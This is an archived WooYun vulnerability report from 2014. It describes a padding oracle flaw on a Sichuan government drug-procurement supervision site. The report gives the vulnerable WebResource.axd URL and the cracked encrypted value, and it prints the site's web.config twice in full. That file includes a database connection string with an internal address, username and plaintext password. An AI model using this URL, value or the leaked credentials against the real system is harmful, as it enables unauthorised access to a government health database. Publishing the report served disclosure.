当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054738

漏洞标题:四川省基本药物集中采购监管平台pandding oracle已读取web.config

相关厂商:cncert国家互联网应急中心

漏洞作者: eval

提交时间:2014-03-28 18:51

修复时间:2014-04-02 18:51

公开时间:2014-04-02 18:51

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-28: 细节已通知厂商并且等待厂商处理中
2014-04-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

补丁没打导致存在该问题

详细说明:

存在链接:http://jcn.scbid.gov.cn/jdjg/WebResource.axd?d=W4rBKx5e5z02dfEHW7yEzw2
破解出来的密钥:
[+] Encrypted value is: -tdD30BG8jzmb-ZMaTslygAAAAAAAAAAAAAAAAAAAAA1
web.config文件:

<?xml version="1.0"?>
<configuration>
  <configSections>
    <sectionGroup name="applicationSettings" type="System.Configuration.Applicat
ionSettingsGroup, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5
c561934e089">
      <section name="HZ.Supervise.Web.Properties.Settings" type="System.Configur
ation.ClientSettingsSection, System, Version=2.0.0.0, Culture=neutral, PublicKey
Token=b77a5c561934e089" requirePermission="false"/>
    </sectionGroup>
    <sectionGroup name="system.web.extensions" type="System.Web.Configuration.Sy
stemWebExtensionsSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=n
eutral, PublicKeyToken=31BF3856AD364E35">
      <sectionGroup name="scripting" type="System.Web.Configuration.ScriptingSec
tionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyTok
en=31BF3856AD364E35">
        <sectionGroup name="webServices" type="System.Web.Configuration.Scriptin
gWebServicesSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutra
l, PublicKeyToken=31BF3856AD364E35">
          </sectionGroup>
      </sectionGroup>
    </sectionGroup>
  </configSections>
  <appSettings>
    <add key="HospitalID" value="~/Hospital/HospitaltotalStatistics.aspx"/>
    <add key="CompanyID_PS" value="~/Company/TradingStatisticsCompanyPS.aspx"/>
    <add key="OrderID" value="~/TotalDrugs/OrderStatistics.aspx"/>
    <add key="AreaID" value="~/Hospital/AreaStatistics.aspx"/>
    <add key="ProcureCatalogID" value="~/TotalDrugs/TotalDrugsStatistics.aspx"/>
    <add key="SortID" value="~/TotalDrugs/SortStatistics.aspx"/>
    <add key="QualityLevel" value="~/Common/QueryDrugsByQualityLevel.aspx"/>
    <add key="SortSource" value="~/TotalDrugs/SortSourceStatistics.aspx"/>
    <add key="CompanyName_SC" value="~/Company/CompanyInfo_SC.aspx"/>
    <add key="CompanyName_TB" value="~/Company/CompanyInfo_TB.aspx"/>
    <add key="HosComDrugs" value="~/TotalDrugs/HospitalCompanyDRugsTotal.aspx"/>
    <add key="DetailInfo" value="~/TotalDrugs/TransactionDetail.aspx"/>
    <add key="InsuranceType" value="~/Common/QueryDrugsByInsuranceType.aspx"/>
    <add key="NoSendDetail" value="~/Company/NoSendDetail.aspx"/>
    <add key="NoSendOnTime" value="~/Company/NoSendOnTimeCompanyPS.aspx"/>
    <add key="ExpensiveDrugs" value="~/TotalDrugs/ExpensivedrugsStatistics.aspx"
/>
    <add key="ExpensiveDrugsSet" value="~/Hospital/HospitalHighPricedDrugs.aspx"
/>
    <add key="MonthHospital" value="~/Hospital/MonthStatistics.aspx"/>
    <add key="UnTradeProduct" value="~/TotalDrugs/UnTradeProcureCatalog.aspx"/>
    <add key="WarningSetup" value="~/EarlyWarning/WarningSetup.aspx"/>
    <add key="WarningMap" value="~/EarlyWarning/WarningMap.aspx"/>
    <add key="WarningDeal" value="~/EarlyWarning/DrugPreWarning_CL.aspx"/>
    <add key="Whitelist" value="~/Admin/BlacklistUserList.aspx"/>
    <add key="InvoiceSerialID" value="~/Hospital/InvoiceList.aspx"/>
    <add key="CommandTimeout" value="300"/>
    <!--瓒呮椂鏃堕棿璁剧疆-->
    <!-- 绯荤粺閮ㄧ讲鍖哄煙 渚嬪 姹熻嫃 320000-->
    <add key="CURRENT_DEPLOY_AREAID" value="510000"/>
    <add key="HZ.Supervise.WebService.MainService" value="http://localhost/MainS
ervice.asmx"/>
  </appSettings>
  <connectionStrings>
    <clear/>
    <add name="connectstrings" connectionString="Data Source=10.10.10.4;Initial
Catalog=scjy;user id=scjyzb;password=yzbzb6110wst;"/>
  </connectionStrings>
  <system.web>
    <!--
            璁剧疆 compilation debug="true" 鍙皢璋冭瘯绗﹀彿鎻掑叆
            宸茬紪璇戠殑椤甸潰涓€備絾鐢变簬杩欎細
            褰卞搷鎬ц兘锛屽洜姝ゅ彧鍦ㄥ紑鍙戣繃绋嬩腑灏嗘鍊?
            璁剧疆涓?true銆?
        -->
    <compilation debug="true">
      <assemblies>
        <add assembly="System.Windows.Forms, Version=2.0.0.0, Culture=neutral, P
ublicKeyToken=B77A5C561934E089"/>
        <add assembly="System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyT
oken=B77A5C561934E089"/>
        <add assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral,
PublicKeyToken=31BF3856AD364E35"/>
        <add assembly="System.Xml.Linq, Version=3.5.0.0, Culture=neutral, Public
KeyToken=B77A5C561934E089"/>
        <add assembly="System.Data.DataSetExtensions, Version=3.5.0.0, Culture=n
eutral, PublicKeyToken=B77A5C561934E089"/>
      </assemblies>
    </compilation>
    <!--
            閫氳繃 <authentication> 鑺傚彲浠ラ厤缃?ASP.NET 鐢ㄦ潵
            璇嗗埆杩涘叆鐢ㄦ埛鐨?
            瀹夊叏韬唤楠岃瘉妯″紡銆?
       -->
    <authentication mode="Windows"/>
    <!--
            濡傛灉鍦ㄦ墽琛岃姹傜殑杩囩▼涓嚭鐜版湭澶勭悊鐨勯敊璇紝
            鍒欓€氳繃 <customErrors> 鑺傚彲浠ラ厤缃浉搴旂殑澶勭悊姝ラ銆傚叿
浣撹鏉ワ紝
            寮€鍙戜汉鍛橀€氳繃璇ヨ妭鍙互閰嶇疆
            瑕佹樉绀虹殑 html 閿欒椤?
            浠ヤ唬鏇块敊璇爢鏍堣窡韪€?
        <customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm">
            <error statusCode="403" redirect="NoAccess.htm" />
            <error statusCode="404" redirect="FileNotFound.htm" />
        </customErrors>
        -->
    <customErrors mode="Off" defaultRedirect="Common/DefaultError.aspx">
      <error statusCode="403" redirect="Common/NoPermission.aspx"/>
      <error statusCode="404" redirect="Common/FileNotFound.aspx"/>
    </customErrors>
    <pages theme="涓婚1">
      <controls>
        <add tagPrefix="hzw" namespace="HZ.Web" assembly="CommonLib"/>
        <add tagPrefix="webdiyer" namespace="Wuqi.Webdiyer" assembly="AspNetPage
r"/>
        <add tagPrefix="asp" namespace="System.Web.UI" assembly="System.Web.Exte
nsions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
        <add tagPrefix="asp" namespace="System.Web.UI.WebControls" assembly="Sys
tem.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD3
64E35"/>
      </controls>
    </pages>
    <httpHandlers>
      <remove verb="*" path="*.asmx"/>
      <add verb="*" path="*.asmx" validate="false" type="System.Web.Script.Servi
ces.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutra
l, PublicKeyToken=31BF3856AD364E35"/>
      <add verb="*" path="*_AppService.axd" validate="false" type="System.Web.Sc
ript.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Cult
ure=neutral, PublicKeyToken=31BF3856AD364E35"/>
      <add verb="GET,HEAD" path="ScriptResource.axd" validate="false" type="Syst
em.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=3.5.0.0, C
ulture=neutral, PublicKeyToken=31BF3856AD364E35"/>
    </httpHandlers>
    <httpModules>
      <add name="ScriptModule" type="System.Web.Handlers.ScriptModule, System.We
b.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"
/>
    </httpModules>
  </system.web>
  <!--
        鍦?Internet 淇℃伅鏈嶅姟 7.0 涓嬭繍琛?ASP.NET AJAX 闇€瑕?system.webServe
r
        鑺傘€傚鏃╂湡鐗堟湰鐨?IIS 鏉ヨ鍒欎笉闇€瑕佹鑺傘€?
    -->
  <system.webServer>
      <validation validateIntegratedModeConfiguration="false"/>
    <modules>
      <remove name="ScriptModule"/>
      <add name="ScriptModule" preCondition="managedHandler" type="System.Web.Ha
ndlers.ScriptModule, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, Pu
blicKeyToken=31BF3856AD364E35"/>
    </modules>
    <handlers>
      <remove name="WebServiceHandlerFactory-Integrated"/>
      <remove name="ScriptHandlerFactory"/>
      <remove name="ScriptHandlerFactoryAppServices"/>
      <remove name="ScriptResource"/>
      <add name="ScriptHandlerFactory" verb="*" path="*.asmx" preCondition="inte
gratedMode" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Ex
tensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
      <add name="ScriptHandlerFactoryAppServices" verb="*" path="*_AppService.ax
d" preCondition="integratedMode" type="System.Web.Script.Services.ScriptHandlerF
actory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=
31BF3856AD364E35"/>
      <add name="ScriptResource" verb="GET,HEAD" path="ScriptResource.axd" preCo
ndition="integratedMode" type="System.Web.Handlers.ScriptResourceHandler, System
.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E
35"/>
    </handlers>
  </system.webServer>
  <startup>
    <supportedRuntime version="v2.0.50727"/>
  </startup>
  <applicationSettings>
    <HZ.Supervise.Web.Properties.Settings>
      <setting name="HZ_Supervise_Web_WebService_Service" serializeAs="String">
        <value>http://emed.3322.org/WebService/MainService.asmx</value>
      </setting>
    </HZ.Supervise.Web.Properties.Settings>
  </applicationSettings>
  <system.codedom>
      <compilers>
        <compiler language="c#;cs;csharp" extension=".cs" type="Microsoft.CSharp
.CSharpCodeProvider, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b7
7a5c561934e089" warningLevel="4">
          <providerOption name="CompilerVersion" value="v3.5"/>
          <providerOption name="WarnAsError" value="false"/>
      </compiler>
    </compilers>
  </system.codedom>
  <runtime>
    <assemblyBinding appliesTo="v2.0.50727" xmlns="urn:schemas-microsoft-com:asm
.v1">
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Extensions" publicKeyToken="31bf3856a
d364e35"/>
        <bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0"/>
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Extensions.Design" publicKeyToken="31
bf3856ad364e35"/>
        <bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0"/>
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>

漏洞证明:

存在链接:http://jcn.scbid.gov.cn/jdjg/WebResource.axd?d=W4rBKx5e5z02dfEHW7yEzw2
破解出来的密钥:
[+] Encrypted value is: -tdD30BG8jzmb-ZMaTslygAAAAAAAAAAAAAAAAAAAAA1
web.config文件:

<?xml version="1.0"?>
<configuration>
  <configSections>
    <sectionGroup name="applicationSettings" type="System.Configuration.Applicat
ionSettingsGroup, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5
c561934e089">
      <section name="HZ.Supervise.Web.Properties.Settings" type="System.Configur
ation.ClientSettingsSection, System, Version=2.0.0.0, Culture=neutral, PublicKey
Token=b77a5c561934e089" requirePermission="false"/>
    </sectionGroup>
    <sectionGroup name="system.web.extensions" type="System.Web.Configuration.Sy
stemWebExtensionsSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=n
eutral, PublicKeyToken=31BF3856AD364E35">
      <sectionGroup name="scripting" type="System.Web.Configuration.ScriptingSec
tionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyTok
en=31BF3856AD364E35">
        <sectionGroup name="webServices" type="System.Web.Configuration.Scriptin
gWebServicesSectionGroup, System.Web.Extensions, Version=3.5.0.0, Culture=neutra
l, PublicKeyToken=31BF3856AD364E35">
          </sectionGroup>
      </sectionGroup>
    </sectionGroup>
  </configSections>
  <appSettings>
    <add key="HospitalID" value="~/Hospital/HospitaltotalStatistics.aspx"/>
    <add key="CompanyID_PS" value="~/Company/TradingStatisticsCompanyPS.aspx"/>
    <add key="OrderID" value="~/TotalDrugs/OrderStatistics.aspx"/>
    <add key="AreaID" value="~/Hospital/AreaStatistics.aspx"/>
    <add key="ProcureCatalogID" value="~/TotalDrugs/TotalDrugsStatistics.aspx"/>
    <add key="SortID" value="~/TotalDrugs/SortStatistics.aspx"/>
    <add key="QualityLevel" value="~/Common/QueryDrugsByQualityLevel.aspx"/>
    <add key="SortSource" value="~/TotalDrugs/SortSourceStatistics.aspx"/>
    <add key="CompanyName_SC" value="~/Company/CompanyInfo_SC.aspx"/>
    <add key="CompanyName_TB" value="~/Company/CompanyInfo_TB.aspx"/>
    <add key="HosComDrugs" value="~/TotalDrugs/HospitalCompanyDRugsTotal.aspx"/>
    <add key="DetailInfo" value="~/TotalDrugs/TransactionDetail.aspx"/>
    <add key="InsuranceType" value="~/Common/QueryDrugsByInsuranceType.aspx"/>
    <add key="NoSendDetail" value="~/Company/NoSendDetail.aspx"/>
    <add key="NoSendOnTime" value="~/Company/NoSendOnTimeCompanyPS.aspx"/>
    <add key="ExpensiveDrugs" value="~/TotalDrugs/ExpensivedrugsStatistics.aspx"
/>
    <add key="ExpensiveDrugsSet" value="~/Hospital/HospitalHighPricedDrugs.aspx"
/>
    <add key="MonthHospital" value="~/Hospital/MonthStatistics.aspx"/>
    <add key="UnTradeProduct" value="~/TotalDrugs/UnTradeProcureCatalog.aspx"/>
    <add key="WarningSetup" value="~/EarlyWarning/WarningSetup.aspx"/>
    <add key="WarningMap" value="~/EarlyWarning/WarningMap.aspx"/>
    <add key="WarningDeal" value="~/EarlyWarning/DrugPreWarning_CL.aspx"/>
    <add key="Whitelist" value="~/Admin/BlacklistUserList.aspx"/>
    <add key="InvoiceSerialID" value="~/Hospital/InvoiceList.aspx"/>
    <add key="CommandTimeout" value="300"/>
    <!--瓒呮椂鏃堕棿璁剧疆-->
    <!-- 绯荤粺閮ㄧ讲鍖哄煙 渚嬪 姹熻嫃 320000-->
    <add key="CURRENT_DEPLOY_AREAID" value="510000"/>
    <add key="HZ.Supervise.WebService.MainService" value="http://localhost/MainS
ervice.asmx"/>
  </appSettings>
  <connectionStrings>
    <clear/>
    <add name="connectstrings" connectionString="Data Source=10.10.10.4;Initial
Catalog=scjy;user id=scjyzb;password=yzbzb6110wst;"/>
  </connectionStrings>
  <system.web>
    <!--
            璁剧疆 compilation debug="true" 鍙皢璋冭瘯绗﹀彿鎻掑叆
            宸茬紪璇戠殑椤甸潰涓€備絾鐢变簬杩欎細
            褰卞搷鎬ц兘锛屽洜姝ゅ彧鍦ㄥ紑鍙戣繃绋嬩腑灏嗘鍊?
            璁剧疆涓?true銆?
        -->
    <compilation debug="true">
      <assemblies>
        <add assembly="System.Windows.Forms, Version=2.0.0.0, Culture=neutral, P
ublicKeyToken=B77A5C561934E089"/>
        <add assembly="System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyT
oken=B77A5C561934E089"/>
        <add assembly="System.Web.Extensions, Version=3.5.0.0, Culture=neutral,
PublicKeyToken=31BF3856AD364E35"/>
        <add assembly="System.Xml.Linq, Version=3.5.0.0, Culture=neutral, Public
KeyToken=B77A5C561934E089"/>
        <add assembly="System.Data.DataSetExtensions, Version=3.5.0.0, Culture=n
eutral, PublicKeyToken=B77A5C561934E089"/>
      </assemblies>
    </compilation>
    <!--
            閫氳繃 <authentication> 鑺傚彲浠ラ厤缃?ASP.NET 鐢ㄦ潵
            璇嗗埆杩涘叆鐢ㄦ埛鐨?
            瀹夊叏韬唤楠岃瘉妯″紡銆?
       -->
    <authentication mode="Windows"/>
    <!--
            濡傛灉鍦ㄦ墽琛岃姹傜殑杩囩▼涓嚭鐜版湭澶勭悊鐨勯敊璇紝
            鍒欓€氳繃 <customErrors> 鑺傚彲浠ラ厤缃浉搴旂殑澶勭悊姝ラ銆傚叿
浣撹鏉ワ紝
            寮€鍙戜汉鍛橀€氳繃璇ヨ妭鍙互閰嶇疆
            瑕佹樉绀虹殑 html 閿欒椤?
            浠ヤ唬鏇块敊璇爢鏍堣窡韪€?
        <customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm">
            <error statusCode="403" redirect="NoAccess.htm" />
            <error statusCode="404" redirect="FileNotFound.htm" />
        </customErrors>
        -->
    <customErrors mode="Off" defaultRedirect="Common/DefaultError.aspx">
      <error statusCode="403" redirect="Common/NoPermission.aspx"/>
      <error statusCode="404" redirect="Common/FileNotFound.aspx"/>
    </customErrors>
    <pages theme="涓婚1">
      <controls>
        <add tagPrefix="hzw" namespace="HZ.Web" assembly="CommonLib"/>
        <add tagPrefix="webdiyer" namespace="Wuqi.Webdiyer" assembly="AspNetPage
r"/>
        <add tagPrefix="asp" namespace="System.Web.UI" assembly="System.Web.Exte
nsions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
        <add tagPrefix="asp" namespace="System.Web.UI.WebControls" assembly="Sys
tem.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD3
64E35"/>
      </controls>
    </pages>
    <httpHandlers>
      <remove verb="*" path="*.asmx"/>
      <add verb="*" path="*.asmx" validate="false" type="System.Web.Script.Servi
ces.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Culture=neutra
l, PublicKeyToken=31BF3856AD364E35"/>
      <add verb="*" path="*_AppService.axd" validate="false" type="System.Web.Sc
ript.Services.ScriptHandlerFactory, System.Web.Extensions, Version=3.5.0.0, Cult
ure=neutral, PublicKeyToken=31BF3856AD364E35"/>
      <add verb="GET,HEAD" path="ScriptResource.axd" validate="false" type="Syst
em.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=3.5.0.0, C
ulture=neutral, PublicKeyToken=31BF3856AD364E35"/>
    </httpHandlers>
    <httpModules>
      <add name="ScriptModule" type="System.Web.Handlers.ScriptModule, System.We
b.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"
/>
    </httpModules>
  </system.web>
  <!--
        鍦?Internet 淇℃伅鏈嶅姟 7.0 涓嬭繍琛?ASP.NET AJAX 闇€瑕?system.webServe
r
        鑺傘€傚鏃╂湡鐗堟湰鐨?IIS 鏉ヨ鍒欎笉闇€瑕佹鑺傘€?
    -->
  <system.webServer>
      <validation validateIntegratedModeConfiguration="false"/>
    <modules>
      <remove name="ScriptModule"/>
      <add name="ScriptModule" preCondition="managedHandler" type="System.Web.Ha
ndlers.ScriptModule, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, Pu
blicKeyToken=31BF3856AD364E35"/>
    </modules>
    <handlers>
      <remove name="WebServiceHandlerFactory-Integrated"/>
      <remove name="ScriptHandlerFactory"/>
      <remove name="ScriptHandlerFactoryAppServices"/>
      <remove name="ScriptResource"/>
      <add name="ScriptHandlerFactory" verb="*" path="*.asmx" preCondition="inte
gratedMode" type="System.Web.Script.Services.ScriptHandlerFactory, System.Web.Ex
tensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/>
      <add name="ScriptHandlerFactoryAppServices" verb="*" path="*_AppService.ax
d" preCondition="integratedMode" type="System.Web.Script.Services.ScriptHandlerF
actory, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=
31BF3856AD364E35"/>
      <add name="ScriptResource" verb="GET,HEAD" path="ScriptResource.axd" preCo
ndition="integratedMode" type="System.Web.Handlers.ScriptResourceHandler, System
.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E
35"/>
    </handlers>
  </system.webServer>
  <startup>
    <supportedRuntime version="v2.0.50727"/>
  </startup>
  <applicationSettings>
    <HZ.Supervise.Web.Properties.Settings>
      <setting name="HZ_Supervise_Web_WebService_Service" serializeAs="String">
        <value>http://emed.3322.org/WebService/MainService.asmx</value>
      </setting>
    </HZ.Supervise.Web.Properties.Settings>
  </applicationSettings>
  <system.codedom>
      <compilers>
        <compiler language="c#;cs;csharp" extension=".cs" type="Microsoft.CSharp
.CSharpCodeProvider, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b7
7a5c561934e089" warningLevel="4">
          <providerOption name="CompilerVersion" value="v3.5"/>
          <providerOption name="WarnAsError" value="false"/>
      </compiler>
    </compilers>
  </system.codedom>
  <runtime>
    <assemblyBinding appliesTo="v2.0.50727" xmlns="urn:schemas-microsoft-com:asm
.v1">
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Extensions" publicKeyToken="31bf3856a
d364e35"/>
        <bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0"/>
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Extensions.Design" publicKeyToken="31
bf3856ad364e35"/>
        <bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="3.5.0.0"/>
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>

修复方案:

请及时更新补丁

版权声明:转载请注明来源 eval@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-02 18:51

厂商回复:

最新状态:

暂无